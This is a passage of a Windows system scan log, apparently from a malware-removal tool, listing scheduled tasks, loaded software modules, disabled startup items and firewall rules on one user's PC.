Task: {E434E6B4-C0FC-4238-B2A6-EB3A265CB241} - System32\Tasks\Microsoft\Windows\Setup\gwx\runappraiser => C:\Windows\system32\GWX\GWXConfigManager.exe [2015-03-24] (Microsoft Corporation)
Task: {EBDE38DB-C1AB-496A-89BE-F5AFC1FC3E17} - System32\Tasks\Sony Corporation\VAIO Care\GetPOTInfo => C:\Program Files\Sony\VAIO Care\VCSystemTray.exe [2014-12-03] (Sony Corporation)
Task: {EFC29B24-98E1-43F2-A2B7-0AA3FD271A3D} - System32\Tasks\Sony Corporation\VAIO Care\UploadPOT => C:\Program Files\Sony\VAIO Care\VCSystemTray.exe [2014-12-03] (Sony Corporation)
Task: {F097C3CA-BC1A-4D8A-8D24-FBE34B061625} - System32\Tasks\update-sys => C:\Program Files (x86)\Skillbrains\Updater\Updater.exe [2014-11-28] ()
Task: {F3A21A1D-F877-441E-81C3-E40095CD3422} - System32\Tasks\Sony Corporation\VAIO Care\VCSelfHeal => C:\Program Files\Sony\VAIO Care\VCSystemTray.exe [2014-12-03] (Sony Corporation)
Task: C:\WINDOWS\Tasks\Adobe Flash Player Updater.job => C:\WINDOWS\SysWOW64\Macromed\Flash\FlashPlayerUpdateService.exe
Task: C:\WINDOWS\Tasks\update-S-1-5-21-2798130160-1945478871-1923780282-1001.job => C:\Program Files (x86)\Skillbrains\Updater\Updater.exe
Task: C:\WINDOWS\Tasks\update-sys.job => C:\Program Files (x86)\Skillbrains\Updater\Updater.exe

==================== Loaded Modules (Whitelisted) ==============

2015-04-03 12:38 - 2014-08-27 16:31 - 00265080 _____ () C:\Program Files\Bitdefender\Bitdefender 2015\txmlutil.dll
2015-04-03 12:38 - 2013-09-03 14:29 - 00101328 _____ () C:\Program Files\Bitdefender\Bitdefender 2015\bdmetrics.dll
2015-04-03 12:38 - 2015-02-12 22:53 - 00003072 _____ () C:\Program Files\Bitdefender\Bitdefender 2015\UI\accessl.ui
2015-04-03 12:38 - 2012-10-29 14:22 - 00152816 _____ () C:\Program Files\Bitdefender\Bitdefender 2015\bdfwcore.dll
2015-05-06 19:55 - 2015-05-06 19:55 - 00790368 _____ () C:\Program Files\Bitdefender\Bitdefender 2015\otengines_00350_004\ashttpbr.mdl
2015-05-06 19:55 - 2015-05-06 19:55 - 00711064 _____ () C:\Program Files\Bitdefender\Bitdefender 2015\otengines_00350_004\ashttpdsp.mdl
2015-05-06 19:55 - 2015-05-06 19:55 - 02683520 _____ () C:\Program Files\Bitdefender\Bitdefender 2015\otengines_00350_004\ashttpph.mdl
2015-05-06 19:55 - 2015-05-06 19:55 - 01326504 _____ () C:\Program Files\Bitdefender\Bitdefender 2015\otengines_00350_004\ashttprbl.mdl
2015-03-27 21:49 - 2015-03-30 09:02 - 00020240 _____ () C:\WINDOWS\system32\spool\PRTPROCS\x64\TeamViewer_PrintProcessor.dll
2015-02-13 05:20 - 2015-02-13 05:20 - 00085832 _____ () C:\Program Files\Common Files\Apple\Apple Application Support\zlib1.dll
2015-02-13 05:20 - 2015-02-13 05:20 - 01346344 _____ () C:\Program Files\Common Files\Apple\Apple Application Support\libxml2.dll
2015-03-27 21:39 - 2014-05-20 09:19 - 00105640 _____ () C:\Program Files\Microsoft Office 15\ClientX64\ApiClient.dll
2015-03-27 18:58 - 2015-05-12 05:30 - 00116368 _____ () C:\Program Files\NVIDIA Corporation\Display\NvSmartMax64.dll
2013-11-28 23:35 - 2013-11-28 23:35 - 00011264 _____ () C:\Program Files (x86)\Bluetooth Suite\Modules\ActivateDesktopDebugger\ActivateDesktopDebugger.dll
2013-11-28 23:32 - 2013-11-28 23:32 - 00086016 _____ () C:\Program Files (x86)\Bluetooth Suite\Modules\Map\MAP.dll
2013-11-28 23:38 - 2013-11-28 23:38 - 00012928 _____ () C:\Program Files (x86)\Bluetooth Suite\ActivateDesktop.exe
2013-11-28 23:38 - 2013-11-28 23:38 - 00384128 _____ () C:\Program Files (x86)\Bluetooth Suite\ContactsApi.dll
2013-11-28 23:28 - 2013-11-28 23:28 - 00020992 _____ () C:\Program Files (x86)\Bluetooth Suite\L10n\de-DE\BtTray.de-DE.dll
2015-05-22 16:44 - 2015-05-22 16:44 - 00043480 _____ () C:\Program Files\FileZilla FTP Client\fzshellext_64.dll
2015-05-22 20:22 - 2015-04-15 21:41 - 01616384 _____ () C:\Program Files (x86)\MediaMonkey\MediaMonkey64Helper.exe
2015-03-13 15:54 - 2015-03-13 15:54 - 00057344 _____ () C:\Program Files\CCleaner\lang\lang-1031.dll
2015-03-27 22:51 - 2015-03-27 22:51 - 00039192 _____ () C:\Program Files\CCleaner\branding.dll
2014-01-01 18:13 - 2014-01-01 18:13 - 00245760 _____ () C:\Users\Ruben\Eigene Programme\uGet\bin\uget.exe
2015-05-09 11:31 - 2015-05-09 11:31 - 00052224 _____ () C:\Users\Ruben\.gradle\native\19\windows-amd64\native-platform.dll
2015-05-12 15:18 - 2015-05-12 15:18 - 00042496 _____ () C:\Program Files\IntelliJ\bin\IdeaWin64.dll
2015-05-12 15:18 - 2015-05-12 15:18 - 00050688 _____ () C:\Program Files\IntelliJ\bin\focuskiller64.dll
2015-05-12 15:18 - 2015-05-12 15:18 - 00061952 _____ () C:\Program Files\IntelliJ\bin\jumplistbridge64.dll
2015-05-12 15:17 - 2015-05-12 15:17 - 00216064 _____ () C:\Program Files\IntelliJ\lib\libpty\win\x86_64\libwinpty.dll
2015-05-12 15:17 - 2015-05-12 15:17 - 00201728 _____ () C:\Program Files\IntelliJ\lib\libpty\win\x86_64\winpty-agent.exe
2015-05-04 19:29 - 2014-11-25 19:09 - 00741888 _____ () C:\Program Files\HexChat\hexchat.exe
2015-05-04 19:29 - 2014-11-22 19:50 - 01394688 _____ () C:\Program Files\HexChat\cairo.dll
2015-05-04 19:29 - 2014-11-22 19:48 - 00076288 _____ () C:\Program Files\HexChat\zlib1.dll
2015-05-04 19:29 - 2014-11-22 19:48 - 00225280 _____ () C:\Program Files\HexChat\libpng16.dll
2015-05-04 19:29 - 2014-11-22 19:48 - 00682496 _____ () C:\Program Files\HexChat\fontconfig.dll
2015-05-04 19:29 - 2014-11-22 19:48 - 00028160 _____ () C:\Program Files\HexChat\iconv.dll
2015-05-04 19:29 - 2014-11-22 19:49 - 00613888 _____ () C:\Program Files\HexChat\pixman-1.dll
2015-05-04 19:29 - 2014-11-22 19:48 - 01502720 _____ () C:\Program Files\HexChat\libxml2.dll
2015-05-04 19:29 - 2014-11-22 19:50 - 00783360 _____ () C:\Program Files\HexChat\harfbuzz.dll
2015-05-04 19:29 - 2014-11-22 19:51 - 00056832 _____ () C:\Program Files\HexChat\lib\gtk-2.0\i686-pc-vs10\engines\libwimp.dll
2015-05-04 19:29 - 2014-11-22 19:50 - 00287744 _____ () C:\Program Files\HexChat\lib\enchant\libenchant_myspell.dll
2015-05-04 19:29 - 2014-11-25 19:09 - 00011264 _____ () C:\Program Files\HexChat\plugins\hcupd.dll
2012-10-08 12:41 - 2012-07-31 04:11 - 01198912 _____ () C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\UNS\ACE.dll
2015-05-23 15:54 - 2015-05-20 19:03 - 00622880 _____ () C:\Program Files (x86)\IObit\LiveUpdate\ProductStatistics.dll
2015-05-23 15:53 - 2015-05-20 19:03 - 00348960 _____ () C:\Program Files (x86)\IObit\Start Menu 8\madExcept_.bpl
2015-05-23 15:53 - 2015-05-20 19:03 - 00183584 _____ () C:\Program Files (x86)\IObit\Start Menu 8\madBasic_.bpl
2015-05-23 15:53 - 2015-05-20 19:03 - 00050976 _____ () C:\Program Files (x86)\IObit\Start Menu 8\madDisAsm_.bpl
2015-05-23 15:54 - 2015-05-20 19:04 - 00268920 _____ () C:\Program Files (x86)\IObit\Start Menu 8\sqlite3.dll
2015-05-23 15:54 - 2015-05-20 19:03 - 00053024 _____ () C:\Program Files (x86)\IObit\Start Menu 8\parseAuto.dll
2015-05-23 15:54 - 2015-05-20 19:03 - 00622880 _____ () C:\Program Files (x86)\IObit\Start Menu 8\ProductStatistics.dll
2015-03-30 19:56 - 2015-05-08 02:36 - 00011920 _____ () C:\Program Files (x86)\NVIDIA Corporation\Update Core\detoured.dll
2015-05-23 15:54 - 2015-05-20 19:04 - 00041248 _____ () C:\Program Files (x86)\IObit\Start Menu 8\winkey.dll
2015-05-22 20:22 - 2015-04-24 01:56 - 00581632 _____ () C:\Program Files (x86)\MediaMonkey\sqlite3MM.dll
2015-05-22 20:22 - 2015-04-24 02:02 - 00054784 _____ () C:\Program Files (x86)\MediaMonkey\MMHelper.dll
2015-05-22 20:22 - 2015-04-24 02:02 - 00390656 _____ () C:\Program Files (x86)\MediaMonkey\Plugins\f_aac.dll
2015-05-22 20:22 - 2015-04-24 02:02 - 00327680 _____ () C:\Program Files (x86)\MediaMonkey\Plugins\f_ape.dll
2015-05-22 20:22 - 2015-04-24 02:02 - 00306688 _____ () C:\Program Files (x86)\MediaMonkey\Plugins\f_AVI.dll
2015-05-22 20:22 - 2015-04-24 02:02 - 00132608 _____ () C:\Program Files (x86)\MediaMonkey\Plugins\f_flac.dll
2015-05-22 20:22 - 2015-04-24 02:02 - 00267264 _____ () C:\Program Files (x86)\MediaMonkey\Plugins\f_flac_codec.dll
2015-05-22 20:22 - 2015-04-24 02:02 - 00262656 _____ () C:\Program Files (x86)\MediaMonkey\Plugins\f_FLV.dll
2015-05-22 20:22 - 2015-04-24 02:02 - 00376832 _____ () C:\Program Files (x86)\MediaMonkey\Plugins\f_mkv.dll
2015-05-22 20:22 - 2015-04-24 02:02 - 00395264 _____ () C:\Program Files (x86)\MediaMonkey\Plugins\f_MP4.dll
2015-05-22 20:22 - 2015-04-24 02:02 - 00328192 _____ () C:\Program Files (x86)\MediaMonkey\Plugins\f_mpc.dll
2015-05-22 20:22 - 2015-04-24 02:02 - 00269824 _____ () C:\Program Files (x86)\MediaMonkey\Plugins\f_MPG.dll
2015-05-22 20:22 - 2015-04-24 02:02 - 00352768 _____ () C:\Program Files (x86)\MediaMonkey\Plugins\f_ogg.dll
2015-05-22 20:22 - 2015-04-24 02:02 - 00141824 _____ () C:\Program Files (x86)\MediaMonkey\Plugins\f_video.dll
2015-05-22 20:22 - 2015-04-24 02:02 - 00335360 _____ () C:\Program Files (x86)\MediaMonkey\Plugins\f_wave.dll
2015-05-22 20:22 - 2015-04-24 01:56 - 00374272 _____ () C:\Program Files (x86)\MediaMonkey\Plugins\f_WMV.dll
2015-05-22 20:22 - 2015-04-24 02:02 - 00061440 _____ () C:\Program Files (x86)\MediaMonkey\Plugins\in_mfaudio.dll
2015-05-22 20:22 - 2010-06-17 16:13 - 00077824 _____ () C:\Program Files (x86)\MediaMonkey\Plugins\in_mpc.dll
2015-05-22 20:22 - 2015-04-24 02:02 - 00321024 _____ () C:\Program Files (x86)\MediaMonkey\Plugins\in_vorbis.dll
2015-05-22 20:22 - 2015-04-24 02:02 - 00081408 _____ () C:\Program Files (x86)\MediaMonkey\Plugins\in_wav.dll
2015-05-22 20:22 - 2015-04-24 02:02 - 00222720 _____ () C:\Program Files (x86)\MediaMonkey\Plugins\in_wma.dll
2015-05-22 20:22 - 2015-04-24 02:02 - 00103936 _____ () C:\Program Files (x86)\MediaMonkey\Plugins\in_wmp3.dll
2015-05-22 20:22 - 2015-04-24 02:02 - 00348672 _____ () C:\Program Files (x86)\MediaMonkey\Plugins\out_MMDS.dll
2015-05-22 20:22 - 2015-04-24 02:02 - 00873984 _____ () C:\Program Files (x86)\MediaMonkey\Plugins\out_WASAPI.dll
2015-05-22 20:22 - 2012-11-09 21:18 - 00013824 _____ () C:\Program Files (x86)\MediaMonkey\Plugins\out_wave.dll
2015-05-22 20:22 - 2015-04-24 02:02 - 00103936 _____ () C:\Program Files (x86)\MediaMonkey\Equalize.dll
2015-05-22 20:22 - 2015-04-24 02:02 - 01055232 _____ () C:\Program Files (x86)\MediaMonkey\Plugins\d_iPhone.dll
2015-05-22 20:22 - 2015-04-24 01:56 - 01176064 _____ () C:\Program Files (x86)\MediaMonkey\iPhoneCalc.dll
2015-05-22 20:22 - 2015-04-24 02:02 - 00900608 _____ () C:\Program Files (x86)\MediaMonkey\Plugins\d_iPod.dll
2015-05-22 20:22 - 2015-04-24 02:02 - 00400384 _____ () C:\Program Files (x86)\MediaMonkey\Plugins\d_iRiverH.dll
2015-05-22 20:22 - 2015-04-24 02:02 - 00422912 _____ () C:\Program Files (x86)\MediaMonkey\Plugins\d_WMDM.dll
2015-05-22 20:22 - 2015-04-24 02:02 - 00132608 _____ () C:\Program Files (x86)\MediaMonkey\WMAuth.dll
2012-03-19 06:07 - 2012-03-19 06:07 - 00647675 _____ () C:\Users\Ruben\Eigene Programme\uGet\bin\libcairo-2.dll
2010-03-31 04:29 - 2010-03-31 04:29 - 00279955 _____ () C:\Users\Ruben\Eigene Programme\uGet\bin\libidn-11.dll
2013-06-23 01:23 - 2013-06-23 01:23 - 00113166 _____ () C:\Users\Ruben\Eigene Programme\uGet\bin\zlib1.dll
2012-03-18 23:00 - 2012-03-18 23:00 - 00576478 _____ () C:\Users\Ruben\Eigene Programme\uGet\bin\libpixman-1-0.dll
2012-10-07 21:40 - 2012-10-07 21:40 - 00177161 _____ () C:\Users\Ruben\Eigene Programme\uGet\bin\libpng15-15.dll
2012-03-19 06:07 - 2012-03-19 06:07 - 00052730 _____ () C:\Users\Ruben\Eigene Programme\uGet\bin\libcairo-gobject-2.dll
2012-05-12 20:49 - 2012-05-12 20:49 - 00051537 _____ () C:\Users\Ruben\Eigene Programme\uGet\bin\libffi-6.dll
2012-03-18 23:00 - 2012-03-18 23:00 - 00052188 _____ () C:\Users\Ruben\Eigene Programme\uGet\bin\ICONV.DLL
2012-03-19 02:01 - 2012-03-19 02:01 - 00226231 _____ () C:\Users\Ruben\Eigene Programme\uGet\bin\libfontconfig-1.dll
2012-03-19 00:43 - 2012-03-19 00:43 - 00549926 _____ () C:\Users\Ruben\Eigene Programme\uGet\bin\libfreetype-6.dll
2012-07-21 23:46 - 2012-07-21 23:46 - 00176311 _____ () C:\Users\Ruben\Eigene Programme\uGet\bin\libexpat-1.dll
2012-03-31 05:31 - 2012-03-31 05:31 - 00050032 _____ () C:\Users\Ruben\Eigene Programme\uGet\lib\pango\1.6.0\modules\pango-basic-win32.dll
2013-11-19 11:21 - 2013-11-19 11:21 - 00347136 _____ () C:\Program Files\Sony\VAIO Care\Iolo\vosges.dll
2015-03-27 21:52 - 2015-03-27 21:52 - 01020928 _____ () C:\Users\Ruben\AppData\Roaming\Mozilla\Firefox\Profiles\i1zvapai.default\extensions\support@lastpass.com\platform\WINNT_x86-msvc\components\lpxpcom.dll
2015-03-27 21:39 - 2015-03-27 21:39 - 00316576 _____ () C:\Program Files\Microsoft Office 15\root\office15\AppVIsvStream32.dll
2015-04-03 12:38 - 2014-08-27 16:30 - 00204280 _____ () C:\Program Files\Bitdefender\Bitdefender 2015\antispam32\txmlutil.dll
2015-04-03 12:38 - 2013-09-03 14:29 - 00095088 _____ () C:\Program Files\Bitdefender\Bitdefender 2015\antispam32\bdmetrics.dll
2015-05-02 11:28 - 2015-05-02 11:28 - 01754296 _____ () C:\Program Files\Microsoft Office 15\Root\Office15\tmpod.dll
2015-05-19 19:29 - 2015-04-14 14:42 - 01032360 _____ () C:\Program Files\Microsoft Office 15\Root\Office15\ADDINS\UmOutlookAddin.dll

==================== Safe Mode (Whitelisted) ===================

(If an item is included in the fixlist, it will be removed from the registry. The "AlternateShell" will be restored.)

HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\str => ""="service"

==================== EXE Association (Whitelisted) ===============

(If an entry is included in the fixlist, the registry item will be restored to default or removed.)


==================== Internet Explorer trusted/restricted ===============

(If an entry is included in the fixlist, it will be removed from the registry.)


==================== Other Areas ============================

(Currently there is no automatic fix for this section.)

HKU\S-1-5-21-2798130160-1945478871-1923780282-1001\Control Panel\Desktop\\Wallpaper -> C:\Users\Ruben\Pictures\Wallpaper2.jpg
DNS Servers: 192.168.2.1

==================== MSCONFIG/TASK MANAGER disabled items ==

(Currently there is no automatic fix for this section.)

HKLM\...\StartupApproved\Run: => "iTunesHelper"
HKLM\...\StartupApproved\Run: => "Bdagent"
HKLM\...\StartupApproved\Run32: => "APSDaemon"
HKLM\...\StartupApproved\Run32: => "QuickTime Task"
HKLM\...\StartupApproved\Run32: => "Andy"
HKLM\...\StartupApproved\Run32: => "Wondershare Helper Compact.exe"
HKU\S-1-5-21-2798130160-1945478871-1923780282-1001\...\StartupApproved\StartupFolder: => "Curse.lnk"
HKU\S-1-5-21-2798130160-1945478871-1923780282-1001\...\StartupApproved\Run: => "Bitdefender-Geldbörse-Agent"

==================== FirewallRules (Whitelisted) ===============

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

FirewallRules: [vm-monitoring-nb-session] => (Allow) LPort=139
FirewallRules: [{DD925A9E-B4C1-4B8E-849F-F5B2D1E3750C}] => (Allow) C:\Program Files\Sony\VAIO Care\VAIOShell.exe
FirewallRules: [{CEAEEEB0-3B7A-4FD2-BD86-5F9D4E5B7181}] => (Allow) C:\Program Files\Sony\VAIO Care\VCSystemTray.exe
FirewallRules: [{8C88C867-50B5-49FA-B27A-A6501E573C53}] => (Allow) C:\Program Files\Sony\VAIO Care\VCAdmin.exe
FirewallRules: [{81A94CB6-BD07-4B41-86F1-56F62D54A30C}] => (Allow) C:\Program Files\Sony\VAIO Care\VCAgent.exe
FirewallRules: [{F0BD25BE-3DA4-45B0-BDC7-A9509356E3FA}] => (Allow) C:\Program Files (x86)\Mozilla Firefox\firefox.exe
FirewallRules: [{1948BECA-120F-4B78-BFDC-8E058F0DEFA9}] => (Allow) C:\Program Files (x86)\Mozilla Firefox\firefox.exe
FirewallRules: [{1DE862D0-EFB3-43CF-BCA0-DD391A80129B}] => (Allow) C:\Program Files (x86)\Skype\Phone\Skype.exe
FirewallRules: [{D6477072-192A-4655-8CFE-3A8B772F2BCC}] => (Allow) C:\Program Files\Microsoft Office 15\root\Office15\outlook.exe
FirewallRules: [{91F6ED8B-B20A-4F6D-8911-A62AA0F81795}] => (Allow) C:\Program Files\Microsoft Office 15\root\Office15\Lync.exe
FirewallRules: [{25D666CF-F9A5-4DB3-9C5A-C6C2205B148B}] => (Allow) C:\Program Files\Microsoft Office 15\root\Office15\UcMapi.exe
FirewallRules: [{461BC6C2-A82E-4B0F-BAF9-8D3DC7865ED1}] => (Allow) C:\Users\Ruben\AppData\Roaming\Dropbox\bin\Dropbox.exe
FirewallRules: [{A719AE01-014A-48EF-B352-C6B3745318EA}] => (Allow) C:\Users\Ruben\AppData\Roaming\Dropbox\bin\Dropbox.exe
FirewallRules: [{882E18AB-1C26-4C7E-9ED6-3AEADE82DB1F}] => (Allow) C:\Program Files (x86)\NVIDIA Corporation\NetService\NvNetworkService.exe
FirewallRules: [{5A618EA3-6C07-4A3B-991A-5573F557885D}] => (Allow) C:\Program Files (x86)\NVIDIA Corporation\NetService\NvNetworkService.exe
FirewallRules: [{66882F61-384B-439A-A65E-C22FD1685276}] => (Allow) C:\Program Files\NVIDIA Corporation\NvStreamSrv\NvStreamNetworkService.exe
FirewallRules: [{073CE425-0219-4249-849D-A37470DD5C03}] => (Allow) C:\Program Files\NVIDIA Corporation\NvStreamSrv\NvStreamNetworkService.exe
FirewallRules: [{7FB503F9-4CAA-4A6E-A481-44D4FCFC18CF}] => (Allow) C:\Program Files\NVIDIA Corporation\NvStreamSrv\nvstreamer.exe
FirewallRules: [{A927EFF4-FC35-44BA-A26E-97542BBDF127}] => (Allow) C:\Program Files\NVIDIA Corporation\NvStreamSrv\nvstreamer.exe
FirewallRules: [{C656BED8-B935-4238-A470-3CE7DC989E1B}] => (Allow) C:\Program Files\Bonjour\mDNSResponder.exe
FirewallRules: [{2F2BBB2B-9020-44C3-BF2E-BEEE4BDD0CB0}] => (Allow) C:\Program Files\Bonjour\mDNSResponder.exe
FirewallRules: [{A33DFD9A-D7C1-499F-99DD-4EDA3A14A28C}] => (Allow) C:\Program Files (x86)\Bonjour\mDNSResponder.exe
FirewallRules: [{449C037F-3ADF-44F5-AC08-6204EF4F9C1E}] => (Allow) C:\Program Files (x86)\Bonjour\mDNSResponder.exe
FirewallRules: [{32BB99B2-9080-4673-9094-08EFD0027CBB}] => (Allow) C:\Program Files\iTunes\iTunes.exe
FirewallRules: [TCP Query User{64D20F49-A8E7-43F0-A7BA-6E2E7F3C4A8E}C:\program files (x86)\mozilla firefox\firefox.exe] => (Block) C:\program files (x86)\mozilla firefox\firefox.exe
FirewallRules: [UDP Query User{F9417769-B14A-4FA9-858C-F3FC27AD174B}C:\program files (x86)\mozilla firefox\firefox.exe] => (Block) C:\program files (x86)\mozilla firefox\firefox.exe
FirewallRules: [{BE539453-E7B6-4C8A-96B2-D9CEF1939CC4}] => (Allow) C:\Users\Ruben\AppData\Roaming\uTorrent\uTorrent.exe
FirewallRules: [{1AFE48EC-9617-427D-A894-712AA60852D1}] => (Allow) C:\Users\Ruben\AppData\Roaming\uTorrent\uTorrent.exe
FirewallRules: [TCP Query User{4D648023-286B-455E-8802-3EF66754A5C8}C:\users\ruben\appdata\roaming\dropbox\bin\dropbox.exe] => (Block) C:\users\ruben\appdata\roaming\dropbox\bin\dropbox.exe
FirewallRules: [UDP Query User{53D3AD5D-3EF1-4BFE-913A-E6513F3EBE35}C:\users\ruben\appdata\roaming\dropbox\bin\dropbox.exe] => (Block) C:\users\ruben\appdata\roaming\dropbox\bin\dropbox.exe
FirewallRules: [TCP Query User{5F0DDEB8-1185-42B5-BE14-DB7B6C36F430}C:\users\ruben\eigene programme\eclipse\eclipse.exe] => (Allow) C:\users\ruben\eigene programme\eclipse\eclipse.exe
FirewallRules: [UDP Query User{A6CAAD5D-EC45-40D3-A2EA-DF5A78B948F0}C:\users\ruben\eigene programme\eclipse\eclipse.exe] => (Allow) C:\users\ruben\eigene programme\eclipse\eclipse.exe
FirewallRules: [TCP Query User{00387E7A-07D1-452B-ABF3-A52B1BD91493}C:\users\ruben\eigene programme\cursemc\minecraft\install\runtime\jre-x64\1.8.0_25\bin\javaw.exe] => (Allow) C:\users\ruben\eigene programme\cursemc\minecraft\install\runtime\jre-x64\1.8.0_25\bin\javaw.exe
FirewallRules: [UDP Query User{65CB58F6-9D10-409F-9809-1882C7350A0F}C:\users\ruben\eigene programme\cursemc\minecraft\install\runtime\jre-x64\1.8.0_25\bin\javaw.exe] => (Allow) C:\users\ruben\eigene programme\cursemc\minecraft\install\runtime\jre-x64\1.8.0_25\bin\javaw.exe
FirewallRules: [{001AF3C6-80DB-46A6-8439-38596A680337}] => (Block) C:\users\ruben\eigene programme\cursemc\minecraft\install\runtime\jre-x64\1.8.0_25\bin\javaw.exe
FirewallRules: [{345109F8-8A06-4336-9505-79E484E02DCF}] => (Block) C:\users\ruben\eigene programme\cursemc\minecraft\install\runtime\jre-x64\1.8.0_25\bin\javaw.exe
FirewallRules: [{0CBE8861-599D-4DA0-9185-FC4397925669}] => (Allow) C:\Program Files (x86)\TeamViewer\TeamViewer.exe
FirewallRules: [{01607C1B-7BB7-4575-99B3-66A696D4356F}] => (Allow) C:\Program Files (x86)\TeamViewer\TeamViewer.exe
FirewallRules: [{2DDE0A59-314B-46D0-B276-FB4EF9BB65F3}] => (Allow) C:\Program Files (x86)\TeamViewer\TeamViewer_Service.exe
FirewallRules: [{3F02CA08-7D82-4B60-AF8E-2B1ED2D4AB52}] => (Allow) C:\Program Files (x86)\TeamViewer\TeamViewer_Service.exe
FirewallRules: [{3EBF5AF8-DCB8-4875-8E7F-8FE480E061EB}] => (Allow) C:\Program Files\Microsoft Office 15\root\Office15\Lync.exe
FirewallRules: [{0A800CDA-F59C-4D51-912E-A144C5416E79}] => (Allow) C:\Program Files\Microsoft Office 15\root\Office15\UcMapi.exe
FirewallRules: [{C6DFD0C4-FED3-4DB5-816B-E0BDBFDB3C54}] => (Allow) C:\Users\Ruben\AppData\Local\Microsoft\OneDrive\OneDrive.exe
FirewallRules: [TCP Query User{04FB0F18-9435-4AF2-BEF8-5CDC3F531123}C:\program files\intellij\bin\idea64.exe] => (Allow) C:\program files\intellij\bin\idea64.exe
FirewallRules: [UDP Query User{313B7718-9F27-4709-848B-8F9241C27477}C:\program files\intellij\bin\idea64.exe] => (Allow) C:\program files\intellij\bin\idea64.exe
FirewallRules: [TCP Query User{CF98FF0B-930A-44F5-8E10-44232E22396C}C:\xampp\filezillaftp\filezillaserver.exe] => (Allow) C:\xampp\filezillaftp\filezillaserver.exe
FirewallRules: [UDP Query User{11E89715-1686-47B7-9236-870765CCB77B}C:\xampp\filezillaftp\filezillaserver.exe] => (Allow) C:\xampp\filezillaftp\filezillaserver.exe
FirewallRules: [TCP Query User{7E2CE727-F46F-4C38-BF8A-7B8BB7DCAB9E}C:\program files\hexchat\hexchat.exe] => (Allow) C:\program files\hexchat\hexchat.exe
FirewallRules: [UDP Query User{393154D5-4F67-4AA3-9B6E-CE2C1B3FB2A8}C:\program files\hexchat\hexchat.exe] => (Allow) C:\program files\hexchat\hexchat.exe
FirewallRules: [TCP Query User{DFCB56DB-ADB1-4A5A-8275-43DF16AC4AD2}C:\program files\intellij\bin\idea.exe] => (Allow) C:\program files\intellij\bin\idea.exe
FirewallRules: [UDP Query User{9AC65511-E2B4-42B6-8BC5-C195BC5D2320}C:\program files\intellij\bin\idea.exe] => (Allow) C:\program files\intellij\bin\idea.exe
FirewallRules: [TCP Query User{AD192AF7-7090-4802-9D2F-19FEA3D04563}C:\program files\intellij\jre\jre\bin\java.exe] => (Allow) C:\program files\intellij\jre\jre\bin\java.exe
FirewallRules: [UDP Query User{FA5B7958-9A79-4EA1-8B95-47AEC9B7BB67}C:\program files\intellij\jre\jre\bin\java.exe] => (Allow) C:\program files\intellij\jre\jre\bin\java.exe
FirewallRules: [TCP Query User{78DC35BA-63BE-45A4-9B28-436D7106EEBF}C:\users\ruben\eigene programme\ts3-server\ts3server_win64.exe] => (Allow) C:\users\ruben\eigene programme\ts3-server\ts3server_win64.exe
FirewallRules: [UDP Query User{493F144E-1701-4D71-B6A1-671F268224EA}C:\users\ruben\eigene programme\ts3-server\ts3server_win64.exe] => (Allow) C:\users\ruben\eigene programme\ts3-server\ts3server_win64.exe
FirewallRules: [TCP Query User{3CD04B14-348E-4AAF-8440-84D39EF96E80}C:\program files\java\jdk1.8.0_45\jre\bin\java.exe] => (Allow) C:\program files\java\jdk1.8.0_45\jre\bin\java.exe
FirewallRules: [UDP Query User{8F1DA501-91DF-4E9B-9C13-0DF33CE5F045}C:\program files\java\jdk1.8.0_45\jre\bin\java.exe] => (Allow) C:\program files\java\jdk1.8.0_45\jre\bin\java.exe
FirewallRules: [TCP Query User{E4D2DEF3-A8E9-4B0B-AC04-856DC6DF5CBB}C:\program files\java\jdk1.8.0_45\bin\java.exe] => (Allow) C:\program files\java\jdk1.8.0_45\bin\java.exe
FirewallRules: [UDP Query User{34DB8E10-71D6-4EBA-9628-44DA321B42CB}C:\program files\java\jdk1.8.0_45\bin\java.exe] => (Allow) C:\program files\java\jdk1.8.0_45\bin\java.exe
FirewallRules: [TCP Query User{6328F78B-3A57-48B4-9146-35217F903A7B}C:\program files (x86)\mediamonkey\mediamonkey (non-skinned).exe] => (Allow) C:\program files (x86)\mediamonkey\mediamonkey (non-skinned).exe
FirewallRules: [UDP Query User{273EABDD-F8CE-48F9-8C9C-D9557C806EB3}C:\program files (x86)\mediamonkey\mediamonkey (non-skinned).exe] => (Allow) C:\program files (x86)\mediamonkey\mediamonkey (non-skinned).exe
FirewallRules: [TCP Query User{A404130A-0425-4132-848C-899EC2569128}C:\program files (x86)\jitsi\jitsi.exe] => (Allow) C:\program files (x86)\jitsi\jitsi.exe
FirewallRules: [UDP Query User{3BDC952C-FE10-4DD7-A82D-83A96D69BA28}C:\program files (x86)\jitsi\jitsi.exe] => (Allow) C:\program files (x86)\jitsi\jitsi.exe
FirewallRules: [TCP Query User{4A3810D0-C1ED-4BFE-824B-3FED2CBBFF87}C:\program files (x86)\counterpath\x-lite\x-lite.exe] => (Allow) C:\program files (x86)\counterpath\x-lite\x-lite.exe
FirewallRules: [UDP Query User{88923A50-6B3E-4CE2-9D9A-3AA81015E839}C:\program files (x86)\counterpath\x-lite\x-lite.exe] => (Allow) C:\program files (x86)\counterpath\x-lite\x-lite.exe
FirewallRules: [{5A7E5589-C90F-45DC-A878-963032A93E22}] => (Block) %ProgramFiles% (x86)\DisplayFusion\DisplayFusion.exe
FirewallRules: [{14F8B720-E677-41E6-916F-B8204F48679E}] => (Block) %ProgramFiles% (x86)\DisplayFusion\DisplayFusionCommand.exe
FirewallRules: [{3E3167E1-AEF9-4A76-ADF0-736B4EDC6A30}] => (Block) %ProgramFiles% (x86)\DisplayFusion\DisplayFusionHelperWin8.exe
FirewallRules: [{DE6AC810-9699-4CF0-857A-82CEF3E5D2ED}] => (Block) %ProgramFiles% (x86)\DisplayFusion\DisplayFusionService.exe
FirewallRules: [{F7794D9B-2754-4396-B659-7F60A34C50CC}] => (Block) %ProgramFiles% (x86)\DisplayFusion\DisplayFusionSettings.exe
FirewallRules: [TCP Query User{D0FBC95D-7272-4FB2-81EF-D12404986665}C:\program files (x86)\mediamonkey\mediamonkey.exe] => (Allow) C:\program files (x86)\mediamonkey\mediamonkey.exe
FirewallRules: [UDP Query User{D2920D89-E343-4747-89D5-994450412161}C:\program files (x86)\mediamonkey\mediamonkey.exe] => (Allow) C:\program files (x86)\mediamonkey\mediamonkey.exe
